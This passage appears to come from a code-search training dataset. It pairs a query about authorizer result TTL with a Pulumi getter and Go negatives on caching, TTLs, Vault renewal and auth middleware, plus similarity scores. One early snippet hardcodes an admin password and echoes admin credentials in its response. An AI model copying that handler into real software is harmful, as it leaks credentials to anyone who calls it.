c.PostForm(\"password\")\n\n\tfmt.Println(\"Podaci: \", username, password)\n\n\tif (username==\"admin\" && password==\"sifra7182\"){\n\t\tc.JSON(http.StatusOK, gin.H{\"success\": true, \"msg\": \"now you are authorized\", \"username\": adminUsername, \"password\": adminPassword})\n\t\treturn\n\t}\n\n\tc.JSON(400, gin.H{\"success\": false, \"msg\": \"Unable to authorize, please check given credentials\", \"errCode\": 21})\n\treturn\n}", "func (s *Client) Authorize() error {\n\t// Get Encoded Access Keys for Authentication\n\tauth := fmt.Sprintf(\"Basic %s\", s.keys())\n\n\t// Create a new request to get our access_token\n\t// and send our Keys on Authorization Header\n\tbody := strings.NewReader(\"grant_type=client_credentials\")\n\treq, err := http.NewRequest(\"POST\", ACCOUNTS_URL, body)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Authorize: error building API request: %w\", err)\n\t}\n\n\treq.Header.Set(\"Authorization\", auth)\n\treq.Header.Set(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\tres, err := http.DefaultClient.Do(req)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Authorize: error sending API request: %w\", err)\n\t}\n\n\tif res.StatusCode != 200 {\n\t\treturn fmt.Errorf(\"Authorize: invalid auth: response: %v\", res) // XXX: debug logs\n\t}\n\n\tvar m SpotifyAuthResponse\n\td := json.NewDecoder(res.Body)\n\tif err := d.Decode(&m); err != nil {\n\t\treturn fmt.Errorf(\"Authorize: error decoding json %w\", err)\n\t}\n\n\ts.accessToken = m.AccessToken\n\treturn nil\n}", "func (s *LoginServer) Authorizer(a Authorizer) {\n\ts.authLock.Lock()\n\ts.auth = a\n\ts.authLock.Unlock()\n}", "func (c *oneloginSamlClient) apiClientCredentials() error {\n\tt := c.authUrl.Query().Get(\"token\")\n\tif len(t) < 1 {\n\t\treturn fmt.Errorf(\"missing token query parameter\")\n\t}\n\t// erase any notion of a query string from authUrl, since we only use it internally\n\tc.authUrl.RawQuery = \"\"\n\n\tb, err := base64.StdEncoding.DecodeString(t)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ts := strings.Split(string(b), `:`)\n\tif len(s) < 2 {\n\t\treturn fmt.Errorf(\"invalid token parameter format\")\n\t}\n\tc.apiClientId = s[0]\n\tc.apiClientSecret = s[1]\n\n\treturn nil\n}", "func (cl *APIClient) SetRoleCredentials(uid string, role string, pw string) *APIClient {\n\tif len(role) > 0 {\n\t\treturn cl.SetCredentials(uid+\"!\"+role, pw)\n\t}\n\treturn cl.SetCredentials(uid, pw)\n}", "func (o *StorageAPI) Authorizer() runtime.Authorizer {\n\n\treturn nil\n\n}", "func (b *BootstrapClient) readAppRoleCredentials() (*vault.AppRoleCredentials, error) {\n\tcreds := &vault.AppRoleCredentials{}\n\terr := b.usingVaultRootToken(func() error {\n\t\troleSecret, err := b.VaultClient.Logical().Read(b.config.authPolicyRoleIDPath)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsecret, err := b.VaultClient.Logical().Write(b.config.authPolicySecretIDPath, nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tcreds.RoleID = roleSecret.Data[\"role_id\"].(string)\n\t\tcreds.SecretID = secret.Data[\"secret_id\"].(string)\n\t\treturn nil\n\t})\n\treturn creds, err\n}", "func Authenticate(role string) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\ttoken, err := GetTokenFromHeader(c)\n\t\tif err != nil {\n\t\t\tc.JSON(http.StatusUnauthorized, gin.H{\"error\": err.Error()})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\t\tif len(role) > 0 && !token.Role.Check(role) {\n\t\t\tc.JSON(http.StatusUnauthorized, gin.H{\"error\": \"Unauthorized\"})\n\t\t\tc.Abort()\n\t\t\treturn\n\t\t}\n\t\tc.Next()\n\t}\n}" ]
[ "0.6120914", "0.57939726", "0.57908136", "0.57908136", "0.57615143", "0.57037455", "0.56405944", "0.55967647", "0.5563223", "0.55153674", "0.54845834", "0.52695364", "0.52332366", "0.5226719", "0.52190316", "0.5182857", "0.51811236", "0.51581323", "0.5140233", "0.5134174", "0.51039463", "0.51030564", "0.5075328", "0.505053", "0.5029039", "0.50206965", "0.50097346", "0.50032336", "0.4975292", "0.49701187", "0.49453196", "0.4939309", "0.4937501", "0.4932032", "0.4927301", "0.49077988", "0.489421", "0.48925275", "0.4888257", "0.48839855", "0.48799148", "0.48704877", "0.48526227", "0.48443186", "0.48342124", "0.48236346", "0.48040953", "0.47789493", "0.47626573", "0.4761354", "0.4753443", "0.47423795", "0.47422484", "0.47244087", "0.4724173", "0.47204736", "0.4716862", "0.47128263", "0.47128066", "0.47042218", "0.47006238", "0.4695748", "0.46944126", "0.46918184", "0.46852988", "0.4683756", "0.46768463", "0.4676199", "0.46705174", "0.46653464", "0.4657918", "0.46576828", "0.46485338", "0.46396917", "0.463944", "0.46382427", "0.46327808", "0.4632623", "0.46269044", "0.46239212", "0.462055", "0.462055", "0.46197468", "0.4618906", "0.46147564", "0.4610832", "0.46055028", "0.4600434", "0.45979846", "0.45961243", "0.45840567", "0.45803866", "0.4579789", "0.4567564", "0.45639306", "0.45593986", "0.45593092", "0.45540878", "0.45433617", "0.45409137" ]
0.6042423
1
The TTL of cached authorizer results in seconds. Defaults to `300`.
func (r *Authorizer) AuthorizerResultTtlInSeconds() pulumi.IntOutput { return (pulumi.IntOutput)(r.s.State["authorizerResultTtlInSeconds"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (f *lazyCallReq) TTL() time.Duration {\n\tttl := binary.BigEndian.Uint32(f.Payload[_ttlIndex : _ttlIndex+_ttlLen])\n\treturn time.Duration(ttl) * time.Millisecond\n}", "func (i *Incarnation) TTL() time.Duration {\n\tr := time.Duration(0)\n\tif i.status != nil {\n\t\tr = time.Duration(i.status.TTL) * time.Second\n\t}\n\treturn r\n}", "func TTL(t time.Duration) selector.Option {\n\treturn func(o *selector.Options) {\n\t\tif o.Context == nil {\n\t\t\to.Context = context.Background()\n\t\t}\n\t\to.Context = context.WithValue(o.Context, ttlKey{}, t)\n\t}\n}", "func TTL(ttl time.Duration) Option {\n\treturn func(lc *cacheImpl) error {\n\t\tlc.ttl = ttl\n\t\treturn nil\n\t}\n}", "func (o LookupAuthorizerResultOutput) AuthorizerResultTtlInSeconds() pulumi.IntOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) int { return v.AuthorizerResultTtlInSeconds }).(pulumi.IntOutput)\n}", "func TTL(t time.Duration) func(Call) error {\n\treturn func(o Call) error {\n\t\tm, ok := o.(*Mutate)\n\t\tif !ok {\n\t\t\treturn errors.New(\"'TTL' option can only be used with mutation queries\")\n\t\t}\n\n\t\tbuf := make([]byte, 8)\n\t\tbinary.BigEndian.PutUint64(buf, uint64(t.Nanoseconds()/1e6))\n\t\tm.ttl = buf\n\n\t\treturn nil\n\t}\n}", "func TTL(ttl time.Duration) crOption {\n\treturn func(cr *ConsumerRegistration) *ConsumerRegistration {\n\t\tcr.ttl = ttl\n\t\treturn cr\n\t}\n}", "func cacheControl(h http.Handler, seconds string) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\t// max age is the number of seconds to cache\n\t\tw.Header().Set(\"Cache-Control\", \"private, max-age=\"+seconds)\n\t\th.ServeHTTP(w, r)\n\t}\n}", "func TTL(duration time.Duration) Setter {\n\treturn func(cgm Congomap) error {\n\t\treturn cgm.TTL(duration)\n\t}\n}", "func (mc *MediaConn) Expiry() time.Time {\n\treturn mc.FetchedAt.Add(time.Duration(mc.TTL) * time.Second)\n}", "func CacheTTL(t time.Duration) metaOp {\n\treturn func(m *PluginMeta) {\n\t\tm.CacheTTL = t\n\t}\n}", "func (db *BoltDB) TTL(key string) int64 {\n\tvar expires int64\n\n\tdb.bolt.View(func(txn *bbolt.Tx) error {\n\t\tb := txn.Bucket([]byte(\"default\"))\n\t\tvalue := b.Get([]byte(key))\n\t\tif value == nil {\n\t\t\texpires = -2\n\t\t\treturn nil\n\t\t}\n\n\t\tparts := strings.SplitN(string(value), \";\", 2)\n\t\texp, _ := strconv.Atoi(parts[0])\n\n\t\tif exp == 0 {\n\t\t\texpires = -1\n\t\t\treturn nil\n\t\t}\n\n\t\tif int(time.Now().Unix()) >= exp {\n\t\t\texpires = -2\n\t\t}\n\n\t\texpires = int64(exp)\n\t\treturn nil\n\t})\n\n\tif expires == -2 {\n\t\treturn -2\n\t}\n\n\tif expires == -1 {\n\t\treturn -1\n\t}\n\n\tnow := time.Now().Unix()\n\n\tif now >= expires {\n\t\treturn -2\n\t}\n\n\treturn (expires - now)\n}", "func MaxCacheTTL(d time.Duration) CacheOption { return maxTTLOption(d) }", "func CachingTripperWithMaxAge(age time.Duration) CachingTripperOption {\n\treturn func(opt *CachingTripperOptions) {\n\t\topt.ExpiresFunc = func(_ *http.Request, timestamp time.Time) *time.Time {\n\t\t\tt := timestamp.Add(age)\n\t\t\treturn &t\n\t\t}\n\t}\n}", "func TTL(ttl time.Duration) func(*Config) error {\n\treturn func(c *Config) error {\n\t\tif ttl <= 0 {\n\t\t\treturn fmt.Errorf(\"ttl must be greater than 0\")\n\t\t}\n\t\tc.ttl = ttl\n\t\treturn nil\n\t}\n}", "func (cb *configBased) CacheTTL(id string) (time.Duration, error) {\n\treturn cb.cacheTTL, nil\n}", "func TTL(ttl time.Duration) Option {\n\treturn func(opts *Options) error {\n\t\topts.Ttl = ttl\n\t\treturn nil\n\t}\n}", "func (lc *LruCache) TTL(key string) (time.Duration, error) {\n\t_, err := lc.LruStore.Retrieve(key)\n\t// Return 0 and error when the key is not in the store\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\tttl, err := lc.MemoryExpiry.GetTTL(key)\n\tif err != nil {\n\t\treturn 0, cache.ErrNoExpiry\n\t}\n\treturn ttl, nil\n}", "func TestRenewAfterTTLExpires(t *testing.T) {\n\tttl := 2\n\tc, v, secret := loginHelper(t, fmt.Sprintf(\"%vs\", ttl))\n\n\t_, err := c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\trenewer, err := v.NewRenewer(&vault.RenewerInput{\n\t\tSecret: secret,\n\t\tIncrement: ttl,\n\t})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\ttime.Sleep(time.Duration(ttl+1) * time.Second)\n\tgo renewer.Renew()\n\tdefer renewer.Stop()\n\n\tselect {\n\tcase err := <-renewer.DoneCh():\n\t\tif err == nil {\n\t\t\tt.Fatalf(\"Expected an error renewing but got none\\n\")\n\t\t}\n\tcase <-renewer.RenewCh():\n\t\tt.Fatal(\"Expected failed renewal, but got successful renewal\\n\")\n\t}\n\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err == nil {\n\t\tt.Fatalf(\"Expected error using pach token after expiry, but got no error\\n\")\n\t}\n}", "func (o BackendServiceCdnPolicyResponseOutput) DefaultTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicyResponse) int { return v.DefaultTtl }).(pulumi.IntOutput)\n}", "func TestTokenTTL(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"Skipping integration tests in short mode\")\n\t}\n\tdeleteAll(t)\n\tadminClient := getPachClient(t, admin)\n\n\t// Create repo (so alice has something to list)\n\trepo := tu.UniqueString(\"TestTokenTTL\")\n\trequire.NoError(t, adminClient.CreateRepo(repo))\n\n\t// Create auth token for alice\n\talice := tu.UniqueString(\"alice\")\n\tresp, err := adminClient.GetAuthToken(adminClient.Ctx(), &auth.GetAuthTokenRequest{\n\t\tSubject: alice,\n\t\tTTL: 5, // seconds\n\t})\n\trequire.NoError(t, err)\n\taliceClient := adminClient.WithCtx(context.Background())\n\taliceClient.SetAuthToken(resp.Token)\n\n\t// alice's token is valid, but expires quickly\n\trepos, err := aliceClient.ListRepo()\n\trequire.NoError(t, err)\n\trequire.ElementsEqualUnderFn(t, []string{repo}, repos, RepoInfoToName)\n\trequire.NoError(t, backoff.Retry(func() error {\n\t\trepos, err = aliceClient.ListRepo()\n\t\tif err == nil {\n\t\t\treturn errors.New(\"alice still has access to ListRepo\")\n\t\t}\n\t\trequire.True(t, auth.IsErrBadToken(err), err.Error())\n\t\trequire.Equal(t, 0, len(repos))\n\t\treturn nil\n\t}, backoff.NewTestingBackOff()))\n}", "func (s *service) TTL(key string) (time.Duration, error) {\n\treturn s.redis.TTL(key).Result()\n}", "func MinCacheTTL(d time.Duration) CacheOption { return minTTLOption(d) }", "func (m *RequestValidator) truncateTTL(ctx context.Context, identity tlsca.Identity, expiry time.Time, roles []string) (time.Duration, error) {\n\tttl := apidefaults.MaxCertDuration\n\n\t// Reduce by remaining TTL on requesting certificate (identity).\n\tidentityTTL := identity.Expires.Sub(m.clock.Now())\n\tif identityTTL > 0 && identityTTL < ttl {\n\t\tttl = identityTTL\n\t}\n\n\t// Reduce TTL further if expiration time requested is shorter than that\n\t// identity.\n\texpiryTTL := expiry.Sub(m.clock.Now())\n\tif expiryTTL > 0 && expiryTTL < ttl {\n\t\tttl = expiryTTL\n\t}\n\n\t// Loop over the roles requested by the user and reduce certificate TTL\n\t// further. Follow the typical Teleport RBAC pattern of strictest setting\n\t// wins.\n\tfor _, roleName := range roles {\n\t\trole, err := m.getter.GetRole(ctx, roleName)\n\t\tif err != nil {\n\t\t\treturn 0, trace.Wrap(err)\n\t\t}\n\t\troleTTL := time.Duration(role.GetOptions().MaxSessionTTL)\n\t\tif roleTTL > 0 && roleTTL < ttl {\n\t\t\tttl = roleTTL\n\t\t}\n\t}\n\n\treturn ttl, nil\n}", "func (spec *Spec) CAExpireTime() time.Time {\n\treturn spec.expiry.CA\n}", "func (spec *Spec) CAExpireTime() time.Time {\n\treturn spec.expiry.CA\n}", "func (o BackendServiceCdnPolicyResponseOutput) ClientTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicyResponse) int { return v.ClientTtl }).(pulumi.IntOutput)\n}", "func (o MethodSettingsSettingsOutput) CacheTtlInSeconds() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v MethodSettingsSettings) *int { return v.CacheTtlInSeconds }).(pulumi.IntPtrOutput)\n}", "func (o BackendBucketCdnPolicyResponseOutput) ClientTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicyResponse) int { return v.ClientTtl }).(pulumi.IntOutput)\n}", "func (o BackendBucketCdnPolicyResponseOutput) DefaultTtl() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicyResponse) int { return v.DefaultTtl }).(pulumi.IntOutput)\n}", "func GetMaxAge(r *http.Request) internal.LifeChanger {\n\treturn func() time.Duration {\n\t\tcacheControlHeader := r.Header.Get(\"Cache-Control\")\n\t\t// headerCacheDur returns the seconds\n\t\theaderCacheDur := internal.ParseMaxAge(cacheControlHeader)\n\t\treturn time.Duration(headerCacheDur) * time.Second\n\t}\n}", "func (lockedCtx *UserCtx) Lifetime() float64 {\n\treturn time.Since(lockedCtx.created).Seconds()\n}", "func (a *Authorization) Expires(t time.Time) {\n\ta.timestamp = t.Unix()\n}", "func (o MethodSettingsSettingsPtrOutput) CacheTtlInSeconds() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v *MethodSettingsSettings) *int {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.CacheTtlInSeconds\n\t}).(pulumi.IntPtrOutput)\n}", "func (s *Secret) TokenTTL() (time.Duration, error) {\n\tif s == nil {\n\t\treturn 0, nil\n\t}\n\n\tif s.Auth != nil && s.Auth.LeaseDuration > 0 {\n\t\treturn time.Duration(s.Auth.LeaseDuration) * time.Second, nil\n\t}\n\n\tif s.Data == nil || s.Data[\"ttl\"] == nil {\n\t\treturn 0, nil\n\t}\n\n\tttl, err := parseutil.ParseDurationSecond(s.Data[\"ttl\"])\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn ttl, nil\n}", "func (s InsertStatement) TTL() time.Duration {\n\tif s.ttl < time.Duration(1) {\n\t\treturn time.Duration(0)\n\t}\n\treturn s.ttl\n}", "func TestTTL(t *testing.T) {\n\ts, err := Run()\n\tok(t, err)\n\tdefer s.Close()\n\tc := redis.NewClient(&redis.Options{\n\t\tNetwork: \"tcp\",\n\t\tAddr: s.Addr(),\n\t})\n\n\tvar b time.Duration\n\tvar n bool\n\n\t// Not volatile yet\n\t{\n\t\tequals(t, time.Duration(0), s.TTL(\"foo\"))\n\t\tb, err = c.TTL(\"foo\").Result()\n\t\tok(t, err)\n\t\tequals(t, -2 * time.Second, b)\n\t}\n\n\t// Set something\n\t{\n\t\terr = c.Set(\"foo\", \"bar\", 0).Err()\n\t\tok(t, err)\n\t\t// key exists, but no Expire set yet\n\t\tb, err = c.TTL(\"foo\").Result()\n\t\tok(t, err)\n\t\tequals(t, -1 * time.Second, b)\n\n\t\tn, err = c.Expire(\"foo\", 1200 * time.Second).Result()\n\t\tok(t, err)\n\t\tequals(t, true, n) // EXPIRE returns 1 on success\n\n\t\tequals(t, 1200*time.Second, s.TTL(\"foo\"))\n\t\tb, err = c.TTL(\"foo\").Result()\n\t\tok(t, err)\n\t\tequals(t, 1200 * time.Second, b)\n\t}\n\n\t// A SET resets the expire.\n\t{\n\t\terr = c.Set(\"foo\", \"bar\", 0).Err()\n\t\tok(t, err)\n\t\tb, err = c.TTL(\"foo\").Result()\n\t\tok(t, err)\n\t\tequals(t, -1 * time.Second, b)\n\t}\n\n\t// Set a non-existing key\n\t{\n\t\tn, err = c.Expire(\"nokey\", 1200 * time.Second).Result()\n\t\tok(t, err)\n\t\tequals(t, false, n) // EXPIRE returns 0 on failure.\n\t}\n\n\t// Remove an expire\n\t{\n\n\t\t// No key yet\n\t\tn, err = c.Persist(\"exkey\").Result()\n\t\tok(t, err)\n\t\tequals(t, false, n)\n\n\t\terr = c.Set(\"exkey\", \"bar\", 0).Err()\n\t\tok(t, err)\n\n\t\t// No timeout yet\n\t\tn, err = c.Persist(\"exkey\").Result()\n\t\tok(t, err)\n\t\tequals(t, false, n)\n\n\t\terr = c.Expire(\"exkey\", 1200 * time.Second).Err()\n\t\tok(t, err)\n\n\t\t// All fine now\n\t\tn, err = c.Persist(\"exkey\").Result()\n\t\tok(t, err)\n\t\tequals(t, true, n)\n\n\t\t// No TTL left\n\t\tb, err = c.TTL(\"exkey\").Result()\n\t\tok(t, err)\n\t\tequals(t, -1 * time.Second, b)\n\t}\n\n\t// Hash key works fine, too\n\t{\n\t\terr = c.HSet(\"wim\", \"zus\", \"iet\").Err()\n\t\tok(t, err)\n\t\t_, err = c.Expire(\"wim\", 1234 * time.Second).Result()\n\t\tok(t, err)\n\t}\n\n\t{\n\t\terr = c.Set(\"wim\", \"zus\", 0).Err()\n\t\tok(t, err)\n\t\terr = c.Expire(\"wim\", -1200).Err()\n\t\tok(t, err)\n\t\tequals(t, false, s.Exists(\"wim\"))\n\t}\n}", "func (m *Metadata) SetTTL(clock Clock, ttl time.Duration) {\n\texpireTime := clock.Now().UTC().Add(ttl)\n\tm.Expires = &expireTime\n}", "func useCached(downloadTime time.Time, maxAge int) bool {\n\tfreshnessLifetime := int(time.Now().Sub(downloadTime).Seconds())\n\tif maxAge > 0 && freshnessLifetime < maxAge {\n\t\treturn true\n\t}\n\treturn false\n}", "func (r *RedisStorage) getTTL() int64 {\n\tr.ttlOnce.Do(func() {\n\t\tr.ttlInSeconds = int64(r.TTL / time.Second)\n\t})\n\n\treturn r.ttlInSeconds\n}", "func (c *Cache) RemainingTime(ctx context.Context, key string) int {\n\treturn int(c.client.TTL(ctx, c.ns+key).Val().Seconds())\n}", "func TestRenewBeforeTTLExpires(t *testing.T) {\n\tttl := 10\n\tc, v, secret := loginHelper(t, fmt.Sprintf(\"%vs\", ttl))\n\tif secret.LeaseDuration < 2 {\n\t\tt.Fatalf(\"expected lease to be at least 2s, but was: %d\", secret.LeaseDuration)\n\t} else if secret.LeaseDuration > 10 {\n\t\tt.Fatalf(\"expected lease to be at most 10s, but was: %d\", secret.LeaseDuration)\n\t}\n\n\t_, err := c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\trenewer, err := v.NewRenewer(&vault.RenewerInput{\n\t\tSecret: secret,\n\t\tIncrement: ttl,\n\t})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\n\t// Begin a renewer background process, and wait until it fires\n\ttime.Sleep(time.Duration(ttl/2) * time.Second)\n\tgo renewer.Renew()\n\tdefer renewer.Stop()\n\tselect {\n\tcase err := <-renewer.DoneCh():\n\t\tif err != nil {\n\t\t\tt.Fatalf(err.Error())\n\t\t}\n\tcase <-renewer.RenewCh():\n\t}\n\n\t// Make sure that the vault lease was only extended by 10s\n\tleaseInfo, err := v.Logical().Write(\"/sys/leases/lookup\", map[string]interface{}{\n\t\t\"lease_id\": secret.LeaseID,\n\t})\n\tif err != nil {\n\t\tt.Fatal(err.Error())\n\t}\n\tnewDurationStr := leaseInfo.Data[\"ttl\"].(json.Number)\n\tnewDuration, err := newDurationStr.Int64()\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n\tif newDuration < 2 {\n\t\tt.Fatalf(\"expected lease to be at least 2s, but was: %d\", newDuration)\n\t} else if newDuration > 20 {\n\t\tt.Fatalf(\"expected lease to be at most 20s, but was: %d\", newDuration)\n\t}\n\n\t// Make sure that the Pachyderm token was also renewed\n\ttime.Sleep(time.Duration(ttl/2+1) * time.Second) // wait til old lease exires\n\t_, err = c.AuthAPIClient.GetAdmins(c.Ctx(), &auth.GetAdminsRequest{})\n\tif err != nil {\n\t\tt.Fatalf(err.Error())\n\t}\n}", "func (s *Server) TTL(ttl uint32) {\n\ts.ttl = ttl\n}", "func (client *Client) Expire(key string, seconds int) int {\n v, _ := client.Do(\"EXPIRE\", key, seconds)\n return v.Integer()\n}", "func (d *Result) Expiration() uint32 {\n\treturn d.expiration\n}", "func (m *RequestValidator) requestTTL(ctx context.Context, identity tlsca.Identity, r types.AccessRequest) (time.Duration, error) {\n\t// If no expiration provided, use default.\n\texpiry := r.Expiry()\n\tif expiry.IsZero() {\n\t\texpiry = m.clock.Now().UTC().Add(defaults.PendingAccessDuration)\n\t}\n\n\tif expiry.Before(m.clock.Now().UTC()) {\n\t\treturn 0, trace.BadParameter(\"invalid request TTL: Access Request can not be created in the past\")\n\t}\n\n\tttl, err := m.truncateTTL(ctx, identity, expiry, r.GetRoles())\n\tif err != nil {\n\t\treturn 0, trace.BadParameter(\"invalid request TTL: %v\", err)\n\t}\n\n\t// Before returning the TTL, validate that the value requested was smaller\n\t// than the maximum value allowed. Used to return a sensible error to the\n\t// user.\n\trequestedTTL := expiry.Sub(m.clock.Now().UTC())\n\tif !r.Expiry().IsZero() && requestedTTL > ttl {\n\t\treturn 0, trace.BadParameter(\"invalid request TTL: %v greater than maximum allowed (%v)\", requestedTTL.Round(time.Minute), ttl.Round(time.Minute))\n\t}\n\n\treturn ttl, nil\n}", "func (cc cacheCluster) TakeWithExpire(val any, key string, query func(val any, expire time.Duration) error) error {\n\treturn cc.TakeWithExpireCtx(context.Background(), val, key, query)\n}", "func (s *Plugin) TTL(keys ...string) (map[string]interface{}, error) {\n\tconst op = errors.Op(\"memcached_plugin_ttl\")\n\treturn nil, errors.E(op, errors.Str(\"not valid request for memcached, see https://github.com/memcached/memcached/issues/239\"))\n}", "func TestSessionTtlGreaterThan30Days(t *testing.T) {\n\n\trt := NewRestTester(t, nil)\n\tdefer rt.Close()\n\n\ta := auth.NewAuthenticator(rt.MetadataStore(), nil, rt.GetDatabase().AuthenticatorOptions())\n\tuser, err := a.GetUser(\"\")\n\tassert.NoError(t, err)\n\tuser.SetDisabled(true)\n\terr = a.Save(user)\n\tassert.NoError(t, err)\n\n\tuser, err = a.GetUser(\"\")\n\tassert.NoError(t, err)\n\tassert.True(t, user.Disabled())\n\n\tresponse := rt.SendRequest(\"PUT\", \"/db/doc\", `{\"hi\": \"there\"}`)\n\tRequireStatus(t, response, 401)\n\n\tuser, err = a.NewUser(\"pupshaw\", \"letmein\", channels.BaseSetOf(t, \"*\"))\n\trequire.NoError(t, err)\n\tassert.NoError(t, a.Save(user))\n\n\t// create a session with the maximum offset ttl value (30days) 2592000 seconds\n\tresponse = rt.SendAdminRequest(\"POST\", \"/db/_session\", `{\"name\":\"pupshaw\", \"ttl\":2592000}`)\n\tRequireStatus(t, response, 200)\n\n\tlayout := \"2006-01-02T15:04:05\"\n\n\tvar body db.Body\n\trequire.NoError(t, base.JSONUnmarshal(response.Body.Bytes(), &body))\n\n\tlog.Printf(\"expires %s\", body[\"expires\"].(string))\n\texpires, err := time.Parse(layout, body[\"expires\"].(string)[:19])\n\tassert.NoError(t, err)\n\n\t// create a session with a ttl value one second greater thatn the max offset ttl 2592001 seconds\n\tresponse = rt.SendAdminRequest(\"POST\", \"/db/_session\", `{\"name\":\"pupshaw\", \"ttl\":2592001}`)\n\tRequireStatus(t, response, 200)\n\n\tbody = nil\n\trequire.NoError(t, base.JSONUnmarshal(response.Body.Bytes(), &body))\n\tlog.Printf(\"expires2 %s\", body[\"expires\"].(string))\n\texpires2, err := time.Parse(layout, body[\"expires\"].(string)[:19])\n\tassert.NoError(t, err)\n\n\t// Allow a ten second drift between the expires dates, to pass test on slow servers\n\tacceptableTimeDelta := time.Duration(10) * time.Second\n\n\t// The difference between the two expires dates should be less than the acceptable time delta\n\tassert.True(t, expires2.Sub(expires) < acceptableTimeDelta)\n}", "func SetTTL(t time.Duration) Setting {\n\treturn func(cf *fetcherSetting) {\n\t\tcf.ttl = t\n\t}\n}", "func (s UpdateStatement) TTL() time.Duration {\n\tif s.ttl < time.Duration(1) {\n\t\treturn time.Duration(0)\n\t}\n\treturn s.ttl\n}", "func Cache(c cache.Cacher, opts CacheOptions) Middleware {\n\tif len(opts.AllowedMethods) == 0 {\n\t\topts.AllowedMethods = []string{\n\t\t\thttp.MethodGet,\n\t\t\thttp.MethodHead,\n\t\t}\n\t}\n\n\tif len(opts.AllowedStatuses) == 0 {\n\t\topts.AllowedStatuses = []int{\n\t\t\t0,\n\t\t\thttp.StatusOK,\n\t\t}\n\t}\n\n\tif opts.TTL == 0 {\n\t\topts.TTL = 15 * time.Minute\n\t}\n\n\tif len(opts.StaleStatuses) == 0 {\n\t\topts.StaleStatuses = []int{\n\t\t\thttp.StatusInternalServerError,\n\t\t}\n\t}\n\n\tif opts.StaleTTL == 0 {\n\t\topts.StaleTTL = 24 * time.Hour\n\t}\n\n\treturn func(next http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tctx := ContextFromRequest(r)\n\t\t\tlog := hlog.FromRequest(r)\n\n\t\t\tmethodNotAllowed := true\n\t\t\tfor _, method := range opts.AllowedMethods {\n\t\t\t\tif r.Method == method {\n\t\t\t\t\tmethodNotAllowed = false\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif !cache.UseCache(ctx) || methodNotAllowed {\n\t\t\t\tnext.ServeHTTP(w, r)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tvar resp CachedResponse\n\t\t\tcacheKey := CacheKey(opts.KeyPrefix, r)\n\n\t\t\t// try to write cached data\n\t\t\tdata, cacheErr := c.Get(ctx, cacheKey)\n\t\t\tif cacheErr == nil {\n\t\t\t\tcacheErr = json.Unmarshal(data, &resp)\n\t\t\t\tif cacheErr != nil {\n\t\t\t\t\tlog.Err(cacheErr).Msg(\"Failed to unmarshal cached response\")\n\t\t\t\t\twrite.Error(w, cacheErr.Error(), http.StatusInternalServerError)\n\t\t\t\t\treturn\n\t\t\t\t}\n\n\t\t\t\tif time.Now().Unix() < resp.Expiration {\n\t\t\t\t\t// copy cached response headers from downstream handlers\n\t\t\t\t\tfor key := range resp.Header {\n\t\t\t\t\t\tif w.Header().Get(key) == \"\" {\n\t\t\t\t\t\t\tw.Header().Set(key, resp.Header.Get(key))\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tAddCacheHeader(w.Header())\n\n\t\t\t\t\tif resp.StatusCode != 0 {\n\t\t\t\t\t\tw.WriteHeader(resp.StatusCode)\n\t\t\t\t\t}\n\n\t\t\t\t\tw.Write(resp.Body)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// get fresh response from handler\n\t\t\tcw := NewCacheWriter(w, opts.UseStale, opts.StaleStatuses)\n\t\t\tnext.ServeHTTP(cw, r)\n\n\t\t\tstatusCodeNotAllowed := true\n\t\t\tfor _, status := range opts.AllowedStatuses {\n\t\t\t\tif cw.statusCode == status {\n\t\t\t\t\tstatusCodeNotAllowed = false\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif statusCodeNotAllowed {\n\t\t\t\tfmt.Println(\"status code:\", cw.statusCode)\n\n\t\t\t\tif opts.UseStale {\n\t\t\t\t\t// If stale data can be used, the response needs\n\t\t\t\t\t// to be written to the ResponseWriter; the\n\t\t\t\t\t// CacheWriter only wrote the response body to\n\t\t\t\t\t// its internal buffer.\n\t\t\t\t\tif includesStaleStatus(cw.statusCode, opts.StaleStatuses) {\n\t\t\t\t\t\tif cacheErr == nil {\n\t\t\t\t\t\t\tfor key := range resp.Header {\n\t\t\t\t\t\t\t\tw.Header().Set(key, 